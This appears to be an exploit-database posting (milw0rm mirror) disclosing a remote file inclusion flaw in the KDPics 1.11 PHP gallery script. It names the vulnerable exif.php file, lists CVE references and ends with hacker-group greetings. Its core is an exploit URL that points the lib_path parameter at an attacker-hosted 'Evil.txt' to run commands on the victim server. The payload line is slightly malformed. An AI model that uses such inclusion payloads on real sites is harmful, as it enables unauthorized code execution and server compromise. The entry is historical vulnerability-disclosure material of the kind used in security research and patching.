KDPics 1.11 - 'exif.php?lib_path' Remote File Inclusion



EKU-ID: 11242 CVE: OSVDB-31870;CVE-2006-6517;OSVDB-31869;OSVDB-31868;CVE-2006-6516 OSVDB-ID:
Author: AsTrex Published: 2007-02-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
KDPics <=  Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by AsTrex    "Rif Hackers  Team"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
URL:
http://www.phpscripts-fr.net/scripts/download.php?id=2212
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
V.CODE: In :KDPics/lib/exifer/exif.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.victime.com/[KDPics_path]/lib/exifer/exif.php?lib_path?=Evil.txt?cmd
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greeetz to : moroccan islam defenders ,ba azdin , xskull , savi7

# milw0rm.com [2007-02-03]